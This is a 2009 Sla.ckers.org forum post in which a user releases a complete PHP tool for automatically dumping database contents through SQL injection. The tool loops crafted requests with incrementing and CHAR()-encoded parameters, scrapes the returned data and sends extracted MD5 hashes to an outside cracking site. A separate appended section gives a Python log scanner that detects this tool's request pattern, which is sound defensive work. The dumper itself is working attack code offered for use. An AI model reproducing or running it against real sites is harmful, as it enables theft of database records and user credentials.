Sla.ckers.org
universal dumper (for sql injections)
Posted by: Kyo
Date: April 20, 2009 02:57PM

I posted this in another thread, so I figured I might as well do a semi-official release here. Basically this tool will dump data for you out of sql injections returning only a single column or whatever. It's written (sloppily) in PHP. Feel free to improve, alter or distribute it (just don't ask for money, and give a backlink to http://wocares.com/ )

Anyway:

<?php

set_time_limit(0);

ini_set("error_reporting", "E_ALL");

ini_set("display_errors", "1");

error_reporting(E_ALL);

function addzeros($x,$os = 2,$sign = "0") {
$x = (string) $x;
$strlen = strlen($x);
for($i = $strlen;$i < $os;$i++) $x = $sign.$x;
return $x;
}
function noquote($string) {
$newstring = "";
while($string) {
$newstring .= ord($string);
$string = substr($string, 1);
if($string) {
$newstring .=",";
}
}
$newstring = "CHAR(".$newstring.")";
return $newstring;
}

function getinbetween($front,$end,$string) {
$frontpos = strpos($string,$front);
if($frontpos !== false) $endpos = strpos(substr($string,$frontpos+strlen($front)),$end);
if($frontpos !== false && $endpos !== false) {
return substr($string,($frontpos+strlen($front)),$endpos);
} else return false;
}

function getmd5raw($md5) {
$gdata = file_get_contents("http://www.gdataonline.com/qkhash.php?mode=txt&hash=".$md5);
if(!$gdata) $gdata = file_get_contents("http://www.gdataonline.com/qkhash.php?mode=txt&hash=".$md5);
return $raw = getinbetween("<td width=\"35%\"><b>","</b></td>",$gdata);
}

function get_date($time) {
return date("r",$time);
}

if($_POST) {
if(get_magic_quotes_gpc()) {
foreach($_POST as $key => $var) {
$_POST[$key] = stripslashes($var);
}
}
echo "<pre>";
$regexouter = "#";
$regexflags = "is";
$url = $_POST['url'];
$times = (int)$_POST['times'];
$i1s = (int)$_POST['i1s'];
$i1i = (int)$_POST['i1i'];
$i2s = (int)$_POST['i2s'];
$i2i = (int)$_POST['i2i'];
$r1s = (int)$_POST['r1s'];
$cookies = str_replace(array("\r","\n"),"",$_POST['cookies']);
$filename = str_replace("/","",$_POST['filename']);
$formfile = str_replace("/","",$_POST['formfile']);
if(!$formfile) $formfile = "form_".time().".htm";
if(!$filename) $filename = "log_".time().".txt";
$r1e = (int)$_POST['r1e'];
$s1 = empty($_POST['s1chr']) ? urlencode($_POST['s1']) : urlencode(noquote($_POST['s1']));
$s2 = empty($_POST['s2chr']) ? urlencode($_POST['s2']) : urlencode(noquote($_POST['s2']));
$s3 = empty($_POST['s3chr']) ? urlencode($_POST['s3']) : urlencode(noquote($_POST['s3']));
$getstuff = explode("\n",str_replace("\r","",$_POST['getstuff']));
$getstuffend = explode("\n",str_replace("\r","",$_POST['getstuffend']));
$getstuffnames = explode("\n",str_replace("\r","",$_POST['getstuffnames']));
$getstuffmod = explode("\n",str_replace("\r","",$_POST['getstuffmodifiers']));
if(count($getstuffend) > count($getstuff)) $max = count($getstuffend);
else $max = count($getstuff);

for($i = 0; $i < $max;$i++) {
if($getstuff[$i] && $getstuffend[$i]) {
$matches[] = array(
'start' => $getstuff[$i],
'end' => $getstuffend[$i],
'name' => $getstuffnames[$i],
'modifier' => strtoupper($getstuffmod[$i])
);
}
}

print_r($matches);
print_r($_POST);
$formcontent = '
<form method="POST" action="'.htmlspecialchars($_SERVER['SCRIPT_NAME']).'">
URL: <input type="text" size="40" name="url" value="'.htmlspecialchars($_POST['url']).'"> (you can use any of the variables below like [I1] )<br>
logfile: <input type="text" size="40" name="filename" value="'.htmlspecialchars($_POST['filename']).'"> <br>
save form? <input type="checkbox" name="saveform" value="1">
form name: <input type="text" size="40" name="formname" value=""> <br>
Cookies: <input type="text" size="40" name="cookies" value="'.htmlspecialchars($_POST['cookies']).'"> <br>
add seperator between data loops? <input type="checkbox" name="seperator" value="1" '.($_POST['seperator'] ? "CHECKED" : "").'><br>
loop <input type="text" size="3" name="times" value="'.htmlspecialchars($_POST['times']).'"> times<br>
Increasing variables:<br>
Increasing 1 - [I1]: start: <input type="text" name="i1s" value="'.htmlspecialchars($_POST['i1s']).'"> increment rate: <input type="text" name="i1i" value="'.htmlspecialchars($_POST['i1i']).'"><br>
Increasing 2 - [I2]: start: <input type="text" name="i2s" value="'.htmlspecialchars($_POST['i2s']).'"> increment rate: <input type="text" name="i2i" value="'.htmlspecialchars($_POST['i2i']).'"><br>
Unchangable variables:<br>
Random 1 - [R1]: from<input type="text" name="r1s" value="'.htmlspecialchars($_POST['r1s']).'"> to <input type="text" name="r1e" value="'.htmlspecialchars($_POST['r1e']).'"><br>
Static variables: (these are so you can change parts of the query (like a where clause) more easily)<br>
Static 1 - [S1]: <input type="text" name="s1" value="'.htmlspecialchars($_POST['s1']).'"> <input type="checkbox" name="s1chr" '.($_POST['s1chr'] ? "CHECKED" : "").'> Encode with CHAR()<br>
Static 2 - [S2]: <input type="text" name="s2" value="'.htmlspecialchars($_POST['s2']).'"> <input type="checkbox" name="s2chr" '.($_POST['s2chr'] ? "CHECKED" : "").'> Encode with CHAR()<br>
Static 3 - [S3]: <input type="text" name="s3" value="'.htmlspecialchars($_POST['s3']).'"> <input type="checkbox" name="s3chr" '.($_POST['s3chr'] ? "CHECKED" : "").'> Encode with CHAR()<br>
<hr>
data to get from the page: (this works based on getting stuff between two strings)<br>
It will get stuff inbetween the first line of the first textarea and the first line of the second textarea, the second line of the first and the second line of the second, etc.<br>third row is names.<br>
<textarea name="getstuff" cols="40" rows="20">'.htmlspecialchars($_POST['getstuff']).'</textarea><textarea name="getstuffend" cols="40" rows="20">'.htmlspecialchars($_POST['getstuffend']).'</textarea><textarea name="getstuffnames" cols="40" rows="20">'.htmlspecialchars($_POST['getstuffnames']).'</textarea>
<input type="submit" value="dump"><br>
</form>';

echo $formcontent;
if($_POST['saveform']) {echo "yes, save form";
file_put_contents($formfile,$formcontent);
}

$i1 = $i1s;
$i2 = $i2s;

file_put_contents($filename,"Time: ".time()." #: ".$times.":\n".print_r($_POST,true)."\n\n\n");
$nodata = false;
$urldata = parse_url($url);
$path = $urldata['path']."?".($urldata['query'] ? $urldata['query'] : "");
$host = $urldata['host'];
for($i = 1;$i <= $times;$i++) {
$fpx = fsockopen ($host, 80, $errno, $errstr, 30);

if(!$fpx) {
sleep(6);

$fpx = fsockopen ($host, 80, $errno, $errstr, 30);

}
if(!$fpx) {
sleep(6);

$fpx = fsockopen ($host, 80, $errno, $errstr, 30);

}

if(!$fpx) {
sleep(120);

$fpx = fsockopen ($host, 80, $errno, $errstr, 30);

}
if($fpx) {
$thispath = str_replace("[I1]",$i1,str_replace("[I2]",$i2,str_replace("[R1]",rand($r1s,$r1e),str_replace("[S1]",$s1,str_replace("[S2]",$s2,str_replace("[S3]",$s3,$path))))));
$fpxdata = "GET ".$thispath." HTTP/1.0
Host: ".$host."
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121622 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Cookie: ".$cookies."
Cache-Control: max-age=0

";

if($i == 1) echo $fpxdata;
fwrite($fpx, $fpxdata);



$data2 = "";

while (!feof($fpx)) {

$data2 .= fgets($fpx,128);

}
if(!$data2 && $nodata == false) {
$i--;
$i1 = $i1 - $i1i;
$i2 = $i2 - $i2i;
$nodata = true;

} elseif($nodata == true) $nodata = false;
fclose($fpx);

if($i == 1) echo "<textarea cols=\"80\" rows=\"20\">".htmlentities($data2)."</textarea><br>";
$x = 1;
foreach($matches as $tomatch) {
$match[$x] = getinbetween($tomatch['start'],$tomatch['end'],$data2);
if($match[$x]) {
if($tomatch['modifier'] == "MD5") {
$raw = getmd5raw($match[$x]);
if($raw) {
$match[$x] = $match[$x]." (".$raw.")";
}
} elseif($tomatch['modifier'] == "DATE") {
$match[$x] = $match[$x]." (".get_date((int)$match[$x]).")";
}
}
file_put_contents($filename,addzeros($i,6).": ".addzeros($x,2).": ".addzeros($tomatch['name'],12," ")." : ".$match[$x]."\n",FILE_APPEND);
$x++;
}
if(isset($_POST['seperator']))
file_put_contents($filename,"################################################\n",FILE_APPEND);
//echo $data2;
}
$i1 = $i1 + $i1i;
$i2 = $i2 + $i2i;
}
} else {
?>
<form method="POST" action="index.php">
URL: <input type="text" size="40" name="url"> (you can use any of the variables below like [I1] )<br>
logfile: <input type="text" size="40" name="filename" value="logfile_<?php echo time(); ?>.txt"> <br>
Cookies: <input type="text" size="40" name="cookies" value=""> <br>
save form? <input type="checkbox" name="saveform" value="1">
form name: <input type="text" size="40" name="formname" value="form_<?php echo time(); ?>.htm"> <br>
add seperator between data loops? <input type="checkbox" name="seperator" value="1"><br>
loop <input type="text" size="3" name="times" value="1"> times<br>
Increasing variables:<br>
Increasing 1 - [I1]: start: <input type="text" name="i1s"> increment rate: <input type="text" name="i1i"><br>
Increasing 2 - [I2]: start: <input type="text" name="i2s"> increment rate: <input type="text" name="i2i"><br>
Unchangable variables:<br>
Random 1 - [R1]: from<input type="text" name="r1s"> to <input type="text" name="r1e"><br>
Static variables: (these are so you can change parts of the query (like a where clause) more easily)<br>
Static 1 - [S1]: <input type="text" name="s1"> <input type="checkbox" name="s1chr"> Encode with CHAR()<br>
Static 2 - [S2]: <input type="text" name="s2"> <input type="checkbox" name="s1chr"> Encode with CHAR()<br>
Static 3 - [S3]: <input type="text" name="s3"> <input type="checkbox" name="s1chr"> Encode with CHAR()<br>
<hr>
data to get from the page: (this works based on getting stuff between two strings)<br>
It will get stuff inbetween the first line of the first textarea and the first line of the second textarea, the second line of the first and the second line of the second, etc.<br>third row is names.<br>
fourth row = modifiers. MD5 = look up on gdata, DATE = convert to real date
<table style="width:100%;"><tr>
<td><textarea name="getstuff" style="width:100%; height:400px;"></textarea></td>
<td><textarea name="getstuffend" style="width:100%; height:400px;"></textarea></td>
<td><textarea name="getstuffnames" style="width:100%; height:400px;"></textarea></td>
<td><textarea name="getstuffmodifiers" style="width:100%; height:400px;"></textarea></td>
</tr></table>
<input type="submit" value="dump"><br>
</form>
<?php
}
?>



Edited 1 time(s). Last edit at 04/20/2009 02:58PM by Kyo.
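A defender-side check for the request pattern this dumper leaves in web server logs, added here as an example and not part of Kyo's post or tool: it parses constructed Apache combined-format lines and flags the two signals the script produces, a CHAR(n,n,...) literal in a query value (what noquote() emits) and a counter parameter that steps by a constant increment across a run of otherwise identical requests from one client (the [I1] loop). It assumes the counter appears as a whole parameter value rather than embedded inside a larger one, and the sample log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed combined-format lines (not from any real server): client 10.0.0.9
# sends the dumper's shape: HTTP/1.0, fixed UA, CHAR() literal, stepping counter.
UA = "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121622 Firefox/3.0.5"
SAMPLE_LOG = [
    '10.0.0.7 - - [20/Apr/2009:14:57:01 +0000] "GET /item.php?id=5 HTTP/1.1" 200 812 "-" "Mozilla/5.0 (Windows NT 6.1)"',
] + [
    f'10.0.0.9 - - [20/Apr/2009:14:58:1{n} +0000] "GET /item.php?id=CHAR%2897%2C100%2C109%2C105%2C110%29&p={n} HTTP/1.0" 200 99{n} "-" "{UA}"'
    for n in range(4)
]

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) (\S+)" (\d{3}) \S+ "[^"]*" "([^"]*)"')
CHAR_RE = re.compile(r"CHAR\(\d+(?:,\d+)*\)", re.IGNORECASE)  # decoded noquote() output

def parse_line(line):
    """Split one combined-format line into the fields the checks need."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, _method, target, proto, _status, ua = m.groups()
    parts = urlsplit(target)  # parse_qsl percent-decodes the values for us
    return {"ip": ip, "path": parts.path, "proto": proto, "ua": ua,
            "query": dict(parse_qsl(parts.query, keep_blank_values=True))}

def stepped_param(queries, min_run=3):
    """Parameter whose integer value steps by a constant amount across a run
    of otherwise identical queries (the dumper's [I1] loop), else None."""
    for name in queries[0] if len(queries) >= min_run else []:
        rest = [{k: v for k, v in q.items() if k != name} for q in queries]
        try:
            vals = [int(q[name]) for q in queries]
        except (KeyError, ValueError):
            continue
        deltas = {b - a for a, b in zip(vals, vals[1:])}
        if rest.count(rest[0]) == len(rest) and len(deltas) == 1 and deltas != {0}:
            return name
    return None

def scan(lines):
    """Return sorted (ip, reason) findings for both dumper signals."""
    findings, runs = set(), defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        if any(CHAR_RE.search(v) for v in rec["query"].values()):
            findings.add((rec["ip"], "CHAR()-encoded literal in query"))
        runs[(rec["ip"], rec["path"], rec["ua"], rec["proto"])].append(rec["query"])
    for (ip, path, _ua, _proto), queries in runs.items():
        name = stepped_param(queries)
        if name:
            findings.add((ip, f"parameter '{name}' stepped across {len(queries)} requests to {path}"))
    return sorted(findings)
```

Running scan(SAMPLE_LOG) reports only 10.0.0.9, once for the CHAR() literal and once for parameter p stepping across four requests; the ordinary browser request from 10.0.0.7 is not flagged.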


